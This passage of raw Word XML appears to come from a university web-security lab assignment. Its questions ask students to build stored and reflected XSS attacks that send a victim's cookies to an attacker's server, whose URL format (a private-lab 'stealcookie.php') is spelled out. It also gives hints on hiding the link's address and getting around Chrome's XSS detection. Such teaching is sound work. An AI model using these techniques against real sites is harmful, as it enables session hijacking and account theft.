        </w:tabs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Question </w:t>
      </w:r>
      <w:r w:rsidR="008B25D9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: (15 pts)</w:t>
      </w:r>
      <w:r w:rsidR="008C0773">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DADB70C" w14:textId="77777777" w:rsidR="000E23BC" w:rsidRDefault="00F51FDA" w:rsidP="00C77A79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 w:rsidRPr="00A2589D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>What are your changes to the malURL.htm file? What are your verification results? Explain this XSS</w:t>
      </w:r>
      <w:r w:rsidR="00C67EF9" w:rsidRPr="00A2589D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2589D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54070D" w14:textId="77777777" w:rsidR="00EE6F77" w:rsidRDefault="00EE6F77" w:rsidP="000D09C3">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9F4056" w14:textId="77777777" w:rsidR="003217FA" w:rsidRDefault="003217FA" w:rsidP="000D09C3">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E73E914" w14:textId="77777777" w:rsidR="000D09C3" w:rsidRDefault="00044E3C" w:rsidP="004E4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Make the attack stealthier, so that when you move the mouse over the second link, my</w:t>
      </w:r>
      <w:r w:rsidR="00F65DB5" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B253FD" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> address information will not be shown on the status bar of</w:t>
      </w:r>
      <w:r w:rsidR="00E63604" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>your browser. In this case, a security conscious user may also be tricked to click the</w:t>
      </w:r>
      <w:r w:rsidR="003D6B83" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>second link. Still, when you click this second “EMC's RSA Security Breach May Cost</w:t>
      </w:r>
      <w:r w:rsidR="008222BA" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bank Customers $100 Million” link, the cookie stored on your browser for this website</w:t>
      </w:r>
      <w:r w:rsidR="006B2FFC" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">will be sent to an attacker’s server (that’s my </w:t>
      </w:r>
      <w:r w:rsidR="002449FF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) using an HTTP GET</w:t>
      </w:r>
      <w:r w:rsidR="0010725A" w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0010725A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>request with the following format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC162D5" w14:textId="77777777" w:rsidR="003E6374" w:rsidRDefault="00270697" w:rsidP="004D6FEC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00E845CA" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/stealcookie.php?info=COOKIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003E6374">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F9528F" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="00ED715E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE0EEDE" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="002F2B03" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="002F2B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need to</w:t>
      </w:r>
      <w:r w:rsidR="002F2B03" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the above </w:t>
      </w:r>
      <w:r w:rsidR="002F2B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="002F2B03" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and format</w:t>
      </w:r>
      <w:r w:rsidR="002F2B03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own IP address but not mine</w:t>
      </w:r>
      <w:r w:rsidR="00AB5DD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> just like what you did in the last question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338C051" w14:textId="77777777" w:rsidR="00367EAF" w:rsidRPr="001F2BDA" w:rsidRDefault="00367EAF" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6336E56D" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRPr="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hint: there could be multiple solutions. One simple solution is to simply add a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C6621" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRPr="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>redirectpage.htm webpage in the XSS directory; you don’t need to change malURL.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6F089" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRPr="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="001F2BDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F2BDA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>because redirectpage.htm has been specified in it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6881B341" w14:textId="77777777" w:rsidR="00D86FC9" w:rsidRDefault="00D86FC9" w:rsidP="00AD5AC4">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F366481" w14:textId="528236EB" w:rsidR="00AD5AC4" w:rsidRDefault="00AD5AC4" w:rsidP="00AD5AC4">
      <w:pPr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Question 7: (15 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BA6D33" w14:textId="77777777" w:rsidR="001F2BDA" w:rsidRDefault="001F2BDA" w:rsidP="000F51A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B06F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Describe the details of your solution. If you use the redirectpage.htm solution,</w:t>
      </w:r>
      <w:r w:rsidR="008F633F" w:rsidRPr="00B06F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B06F83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>please provide the content of this file. What are your verification results?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC0A2D" w14:textId="77777777" w:rsidR="00F45AA2" w:rsidRDefault="00F45AA2" w:rsidP="008D5453">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561F5995" w14:textId="77777777" w:rsidR="003217FA" w:rsidRDefault="003217FA" w:rsidP="008D5453">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BBC7F13" w14:textId="77777777" w:rsidR="00001AF1" w:rsidRDefault="00D768A2" w:rsidP="00905CFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Basically, the above two links illustrated the persistent (or stored) XSS attacks. That is,</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if an attack can store those links on your legitimate webpages or websites, they can</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>perform attacks such as cookie stealing. This XSS Web application is also vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to non-persistent (or reflected) XSS attacks. In this task, demonstrate that the above</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>cookie stealing attacks can happen by using reflected XSS attacks. In other words,</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">reflected XSS attacks can </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>also send the cookie stored on your browser for this website</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to an attacker’s server (that’s my </w:t>
      </w:r>
      <w:r w:rsidR="00466F44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) using an HTTP GET request with the</w:t>
      </w:r>
      <w:r w:rsidR="00AA39AD" w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00001AF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>following format:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963BC7D" w14:textId="77777777" w:rsidR="00D768A2" w:rsidRPr="00001AF1" w:rsidRDefault="00270697" w:rsidP="00001AF1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00E940ED" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/XSS/stealcookie.php?info=COOKIES</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E940ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6242F747" w14:textId="77777777" w:rsidR="000F47F4" w:rsidRDefault="000F47F4" w:rsidP="000F47F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E153FE7" w14:textId="77777777" w:rsidR="00D768A2" w:rsidRDefault="00D768A2" w:rsidP="00E860C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="00851131" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="00851131">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need to</w:t>
      </w:r>
      <w:r w:rsidR="00851131" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> use the above </w:t>
      </w:r>
      <w:r w:rsidR="00851131">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidR="00851131" w:rsidRPr="009709B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and format</w:t>
      </w:r>
      <w:r w:rsidR="00851131">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> with your own IP address but not mine just like what you did in the last question</w:t>
      </w:r>
      <w:r w:rsidR="00F66170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504143FA" w14:textId="77777777" w:rsidR="00A91FCE" w:rsidRPr="00E860C5" w:rsidRDefault="00A91FCE" w:rsidP="00E860C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D9BD76" w14:textId="77777777" w:rsidR="00D768A2" w:rsidRDefault="00D768A2" w:rsidP="00144F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hint: you don’t need to make any change to this existing XSS Web application. You</w:t>
      </w:r>
      <w:r w:rsidR="00144F25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>simply need to demonstrate the vulnerability by cleverly constructing input to this XSS</w:t>
      </w:r>
      <w:r w:rsidR="00144F25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Web application.</w:t>
      </w:r>
      <w:r w:rsidR="00346ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Probably Google Chrome browser will detect your XSS attacks, then you will need to </w:t>
      </w:r>
      <w:r w:rsidR="005A55E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">restart your Google Chrome browser with a </w:t>
      </w:r>
      <w:r w:rsidR="008F5F44">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">specific </w:t>
      </w:r>
      <w:r w:rsidR="005A55E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">flag or simply </w:t>
      </w:r>
      <w:r w:rsidR="00346ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">change to </w:t>
      </w:r>
      <w:r w:rsidR="00BA45D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">another browser such as </w:t>
      </w:r>
      <w:r w:rsidR="00346ED6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA27C0" w14:textId="77777777" w:rsidR="00AB4938" w:rsidRDefault="00AB4938" w:rsidP="00657B3B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26464A6F" w14:textId="3EDEE37E" w:rsidR="00D768A2" w:rsidRPr="00D768A2" w:rsidRDefault="00D768A2" w:rsidP="00657B3B">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Question 8: (15 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A253D2" w14:textId="77777777" w:rsidR="001D4DFA" w:rsidRDefault="00D768A2" w:rsidP="00657B3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D768A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
